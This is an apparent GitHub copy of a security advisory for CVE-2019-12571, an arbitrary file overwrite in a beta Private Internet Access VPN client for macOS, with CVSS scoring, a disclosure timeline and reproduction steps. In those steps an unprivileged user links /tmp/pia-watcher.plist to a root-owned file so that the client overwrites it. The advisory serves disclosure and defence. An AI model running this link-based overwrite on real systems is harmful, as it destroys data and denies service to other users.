-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathCVE-2019-12571.txt
111 lines (73 loc) · 3.44 KB
/
CVE-2019-12571.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
Title: PIA Beta macOS Arbitrary File Overwrite
Author: Rich Mirch
CVE: CVE-2019-12571
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client
v0.9.8 beta (build 02099) for macOS could allow an authenticated, local attacker to
overwrite arbitrary files.
When the client initiates a connection, the XML /tmp/pia-watcher.plist file is created.
If the file exists, it will be truncated and the contents completely overwritten.
This file is removed on disconnect. An unprivileged user can create a hard or soft
link to arbitrary files owned by any user on the system, including root. This creates
a denial of service condition and possible data loss if leveraged by a malicious local user.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1
Test Environment
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v0.9.8 beta (build 02099)
Steps to reproduce
All steps are executed as a low privileged user.
macbook:~ test2$ id
uid=508(test2) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),704(com.apple.sharepoint.group.4),100(_lpoperator),701(com.apple.sharepoint.group.1),333(piavpn),703(com.apple.sharepoint.group.3),702(com.apple.sharepoint.group.2)
Step 1 - Create a root owned test file with permissions 600.
bash-3.2# echo "this is a test" > /etc/test.file
bash-3.2# chmod 600 /etc/test.file
bash-3.2# ls -ld /etc/test.file
-rw------- 1 root wheel 15 Dec 27 10:14 /etc/test.file
Step 2 - Show that test2 does not have permission to write to /etc/test.file.
macbook:~ test2$ echo test > /etc/test.file
-bash: /etc/test.file: Permission denied
Step 3 - Create a hard or soft link to a root owned file.
macbook:~ test2$ ln /etc/test.file /tmp/pia-watcher.plist
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /etc/test.file
12888119231 -rw------- 2 root wheel 15 Dec 27 10:14 /tmp/pia-watcher.plist
Step 4 - Open the PIA client and connect. The file will be overwritten with the XML plist.
macbook:~ test2$ ls -li /etc/test.file /tmp/pia-watcher.plist
ls: /tmp/pia-watcher.plist: No such file or directory
12888119231 -rw------- 1 root wheel 801 Dec 27 10:17 /etc/test.file
Step 5 - As root display the contents of /etc/secret.file
bash-3.2# cat /etc/test.file
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.privateinternetaccess.vpn.watcher</string>
<key>ProgramArguments</key>
<array>
<string>/Applications/Private Internet Access.app/Contents/MacOS/pia-openvpn-helper</string>
</array>
<key>EnvironmentVariables</key>
<dict>
<key>script_type</key>
<string>watch-notify</string>
</dict>
<key>StandardErrorPath</key>
<string>/Library/Application Support/com.privateinternetaccess.vpn/watcher.log</string>
<key>WatchPaths</key>
<array>
<string>/Library/Preferences/SystemConfiguration</string>
</array>
</dict>
</plist>
Timeline:
2018-12-27: Reported to vendor
2018-12-27: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure